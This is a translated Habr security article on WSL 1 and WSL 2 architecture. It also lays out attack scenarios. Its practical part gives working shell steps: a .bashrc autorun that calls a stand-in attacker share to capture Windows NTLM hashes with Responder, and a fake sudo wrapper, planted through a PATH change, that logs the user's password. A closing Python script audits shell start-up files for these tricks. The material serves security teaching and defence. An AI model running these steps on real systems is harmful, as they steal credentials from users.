WSL Experiments. Part 1

Hello, Habr! In October OTUS is launching a new course, "Linux Security". Ahead of the start of the course, we are sharing an article written by one of our instructors, Alexander Kolesnikov.

WSL Experiments. Part 1

In 2016, Microsoft introduced the IT community to a new technology, WSL (Windows Subsystem for Linux), which went on to bring together two previously irreconcilable competitors that had fought for popularity among ordinary and advanced OS users alike: Windows and Linux. The technology makes it possible to use Linux tools in a Windows environment without having to boot Linux, for example via multi-boot. On Habr you can find many articles describing the advantages of using WSL. Unfortunately, at the time of writing, no study of the security of this symbiosis of operating systems could be found on this resource. This article is an attempt to fix that. It describes the architecture of WSL 1 and WSL 2 and examines several examples of attacks on systems that use these technologies. The article is split into two parts. The first presents the main theoretical attack techniques from the Linux and Windows sides. The second covers setting up a test environment and reproducing the attacks.

WSL 1: Architecture

To dive into WSL security issues with any precision, it is necessary to know the main nuances of how the subsystem is implemented. One of the main user tasks that WSL solves is the ability to work through a Linux terminal on a host running Windows. Moreover, the integration offered was so native that Linux executables (ELFs) could be run directly on Windows. To achieve this, a special subsystem was created inside Windows 10 that lets Linux applications run through special system calls; in other words, an attempt was made to map the set of Linux syscalls onto Windows. Physically this was implemented by adding new drivers and a new process type. Visually the architecture looked like this:

[Image: WSL experiments. Part 1]

In fact, interaction with the Linux operating system was organised through several kernel modules and a special process type, the pico process. From the diagram above you can see that a process that runs Linux code on the host must be native and must use the same resources as ordinary Windows applications. But how is this achieved? The Drawbridge project developed Windows process concepts that provide all the components necessary (depending on the process type) to run an application from another OS.

Note that the proposed abstraction made it possible to ignore which operating system (Windows, in this case) the foreign process is expected to run on, and to present a generic process instead.

Thus any application inside a pico process can run independently of the Windows kernel, provided that:

  1. Compatibility problems and the translation of system calls are handled by a special provider;
  2. Access control is carried out through the Security Monitor. The monitor lives in the kernel, so Windows needed an upgrade in the form of a new driver that could act as the provider for such processes. The prototype pico process is shown schematically below:

[Image: WSL experiments. Part 1]

Since Linux file systems use case-sensitive file and directory names, two kinds of file system were added to Windows for WSL: VolFS and DriveFS. VolFS is an implementation of the Linux file system; DriveFS is a file system that works by Windows rules but can opt into case sensitivity.

WSL 2

WSL 1 had a number of limitations that kept it from covering the full range of tasks: for example, it could not run 32-bit Linux applications, and device drivers could not be used. So in 2020 WSL 2 was released, which changed the approach to building the subsystem. WSL 2 is an optimised virtual machine whose resource characteristics match those of WSL 1. Now, depending on the tasks a Windows user needs to solve, the appropriate version of the Linux subsystem can be chosen. To mitigate possible problems, WSL 2 was implemented on top of Hyper-V inside Windows 10. In this form Windows can run the Linux kernel separately. It is worth remembering that WSL version 1 was introduced as a beta feature meant to show the direction in which Windows was developing in this area, so the move to Hyper-V was natural. The final architecture looks like this:

[Image: WSL experiments. Part 1]

In this version the Windows and Linux kernels have their own resources, and the only point of intersection is the file system, though even that intersection is not complete. Interaction between the file systems is handled by a client-server wrapper that works over the 9P protocol.

Today Microsoft offers the ability to switch between WSL 1 and WSL 2. Both versions are available for use.

WSL Security

At the moment there are several works describing approaches to using legitimate OS functionality to compromise the interaction between the subsystems. We will use their scripts to check whether the attacks are still relevant at the time of writing. The list of problems and scenarios:

1. Implementation of the file system: access rights, presence of shared directories and data exchange mechanisms.

Research was carried out to detect violations of the access rules in both directions, Linux FS -> Windows FS and Windows FS -> Linux FS. It showed that a given file inside the target OS can be modified. Attempts were also made to substitute, duplicate and delete parts of the file systems.

Scenarios:

  • A. Attack from the Windows operating system: modification of files in the Linux OS /etc directory.
  • B. Attack from the Linux operating system: modification of files in the directories C:\Windows, C:\Program Files, C:\Users\<User>

2. Implementation of the network stack.

The research was carried out using examples of attacks from Linux on Windows. Features of the network stack were used, for example the authentication mechanisms for various resources.

Scenarios:

  • Opening access to a port held by the Windows system
  • Opening a port without the appropriate rights
  • Running a reverse shell from an ELF file on the Windows operating system.

3. Hiding the launch of malicious software behind the WSL subsystem.

The research rests on a simple principle: in the case of WSL 1, security subsystems cannot intercept events in another kernel that operates through a legitimate provider from the host OS. In the case of WSL 2, there is no way to observe events that occur in a separate kernel inside a lightweight virtual machine.

Scenario:

1) Launch a remote-access program on the system and observe which events are logged.

WSL 1 experiment: hash theft (Windows)

We have finally reached the practical part. First, a test environment must be set up. All experiments are performed on a stand with Windows 10 2004. Ubuntu 18.04 was chosen as the WSL operating system image. The image was chosen at random; any other will work the same way. Commands for building the stand:

Start powershell.exe as administrator.

For WSL 1 run the following commands:

  1. Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux # enable the WSL feature
  2. Invoke-WebRequest -Uri aka.ms/wsl-ubuntu-1804 -OutFile ~/Ubuntu.appx -UseBasicParsing # download the Linux image from the Microsoft Store
  3. Ubuntu.appx install --root # install the image
     You may have to click through the setup process and create a new user with fewer rights than root. For our tests this will be the regular user sam.
  4. Restart-Computer # reboot
  5. After the stand restarts, you can run the bash command. If everything went well, you will see output similar to this in the Windows console:

[Image: WSL experiments. Part 1]

We will use a Kali Linux distribution as the attacking machine; all machines must be on the same local network.

Suppose we have unprivileged access to WSL on the Windows machine. Let's try to attack the operating system by running a command from Linux. To carry out the attack we use a simple autorun mechanism: we add our script to the commands Linux runs at shell start-up. To do this, the .bashrc file has to be modified.

On the machine with WSL we run:

1. bash
2. Change to the user's home directory: cd /home/sam/
3. echo '/home/sam/.attack.sh' >> .bashrc
4. echo 'icacls.exe "\\\\attacker_ip\\shareName\\" > /dev/null 2>&1' >> .attack.sh
5. chmod u+x .attack.sh
6. exit

On the Kali Linux machine we run:

1. Responder -I eth0 -rdvw

On the Windows machine, start bash.

The expected result on the Kali Linux machine:

[Image: WSL experiments. Part 1]

So we obtained Windows hashes through the WSL subsystem by running a command on Linux.

WSL 1 experiment: obtaining a password (Linux OS)

Let's repeat the experiment once more. For this check we add several commands to the .bashrc file in order to obtain the Linux user's password.

Start bash and enter the commands:

1. mkdir .hidden
2. echo 'export PATH=$HOME/.hidden/:$PATH' >> .bashrc
3. echo 'read -sp "[sudo] password for $USER: " sudopass' > .hidden/sudo
4. echo 'echo ""' >> .hidden/sudo
5. echo 'sleep 2' >> .hidden/sudo
6. echo 'echo "Sorry, try again."' >> .hidden/sudo
7. echo 'echo "$sudopass" >> /home/sam/.hidden/pass.txt' >> .hidden/sudo
8. echo '/usr/bin/sudo "$@"' >> .hidden/sudo
9. chmod +x .hidden/sudo
10. exit

For the attack to complete, user sam has to call sudo in the Linux terminal. After that, the Linux OS password will be in the pass.txt file:

[Image: WSL experiments. Part 1]

The implementation of the attacks is provided for informational purposes only.
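As an added example (not part of the original article or the author's code), here is a small Python audit a defender can run over a WSL user's shell start-up files to spot both tricks shown above: a hidden script launched from .bashrc that hands a Windows executable a UNC path, and a PATH prepend that puts a fake sudo ahead of /usr/bin. The file contents, the host 10.0.0.5 and the user names are constructed for the demo.

```python
import re

# Constructed sample: the files both experiments leave behind for user sam
# (host 10.0.0.5 and the share name are made up).
FILES = {
    "/home/sam/.bashrc": "alias ll='ls -la'\n"
                         "/home/sam/.attack.sh\n"
                         "export PATH=$HOME/.hidden/:$PATH\n",
    "/home/sam/.attack.sh": r'icacls.exe "\\\\10.0.0.5\\share\\" > /dev/null 2>&1',
    "/home/sam/.hidden/sudo": "read -sp '[sudo] password for sam: ' sudopass\n",
}

# Dotfiles a stock Ubuntu .bashrc legitimately references: never flag these.
KNOWN_DOTFILES = {".bashrc", ".bash_aliases", ".bash_profile", ".profile"}

HIDDEN_REF = re.compile(r"(?:^|[\s;&|])((?:\$HOME|~|/home/\w+)/\.[\w.-]+)")
WIN_EXE_UNC = re.compile(r"\b[\w-]+\.exe\b.*?\\\\+[\w.-]+", re.I)  # foo.exe ... \\host
PATH_PREPEND = re.compile(r"PATH=(\$HOME|~|/home/\w+)/(\.[^/:]+)/?:")  # PATH=$HOME/.x:


def audit_bashrc(files: dict, user: str) -> list:
    """Return (file, finding) pairs for user's .bashrc and the hidden scripts it runs."""
    home = f"/home/{user}"
    expand = lambda p: p.replace("$HOME", home).replace("~", home, 1)
    queue, seen, findings = [f"{home}/.bashrc"], set(), []
    while queue:
        path = queue.pop(0)
        if path in seen:
            continue
        seen.add(path)
        for line in files.get(path, "").splitlines():
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            for ref in (expand(m.group(1)) for m in HIDDEN_REF.finditer(line)):
                if ref.rsplit("/", 1)[1] not in KNOWN_DOTFILES:
                    findings.append((path, f"runs or sources hidden file {ref}"))
                    queue.append(ref)  # follow it: the payload usually lives there
            if WIN_EXE_UNC.search(line):
                findings.append((path, "Windows .exe given a UNC path (NTLM may leak)"))
            if m := PATH_PREPEND.search(line):
                d = expand(f"{m.group(1)}/{m.group(2)}")
                findings.append((path, f"PATH prepends user-writable {d}"))
                if f"{d}/sudo" in files:
                    findings.append((path, f"{d}/sudo shadows /usr/bin/sudo"))
    return findings
```

On a real host, build the `files` map from the user's home directory (read .bashrc, .profile and whatever they reference) and review every finding by hand; the `.exe` check only fires when a UNC path follows, so ordinary WSL interop aliases are not reported.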

The next part of the article will describe the implementation of the 9P protocol, look at building a scanner for this protocol, and carry out an attack using it.


Source: www.habr.com
